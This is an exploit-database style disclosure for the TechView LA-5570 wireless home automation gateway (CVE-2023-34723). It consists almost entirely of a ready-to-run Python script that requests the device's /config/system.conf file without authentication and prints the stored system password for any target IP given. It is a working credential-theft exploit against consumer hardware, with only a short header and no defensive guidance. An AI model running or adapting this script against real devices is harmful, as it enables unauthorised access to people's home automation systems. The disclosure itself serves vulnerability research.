TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation

# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities# Google Dork: N/A# Date: 25/08/2023# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570# Software Link: N/A# Version: 1.0.19_T53# Tested on: MACOS/Linux# CVE : CVE-2023-34723# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725#!/opt/homebrew/bin/python3import requestsimport sysfrom time import sleepfrom urllib3.exceptions import InsecureRequestWarningfrom colorama import initfrom colorama import Fore, Back, Styleimport reimport osimport ipaddressrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)def banner():    if os.name == 'posix':        clr_cmd = ('clear')    elif os.name == 'nt':        clr_cmd = ('cls')    os.system(clr_cmd)    print ("[+]****************************************************[+]")    print (" | Author      : The Security Team                      |")    print (" | Company     : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")    print (" | Description : TechVIEW LA-5570 Directory Traversal   |")    print (" | Usage       : "+sys.argv[0]+" <target>              |")       print ("[+]****************************************************[+]")def usage():    print (f"Usage: {sys.argv[0]} <target>")def main(target):    domain = "http://"+target+"/config/system.conf"    try:        url = domain.strip()        r = requests.get(url, verify=False, timeout=3)        print ("[+] Retrieving credentials", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        sleep(1)        print(" .", flush=True, end='')        if ("system_password" in r.text):            data =  (r.text.split("\n"))            print (f"\n{data[1]}")        else:            print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)    except TimeoutError:        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)    except KeyboardInterrupt:        return    except requests.exceptions.Timeout:        print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)        return        if __name__ == '__main__':    if len(sys.argv)>1:        banner()        target = sys.argv[1]        try:            validate = ipaddress.ip_address(target)            if (validate):                main (target)        except ValueError as e:            print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)     else:        print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)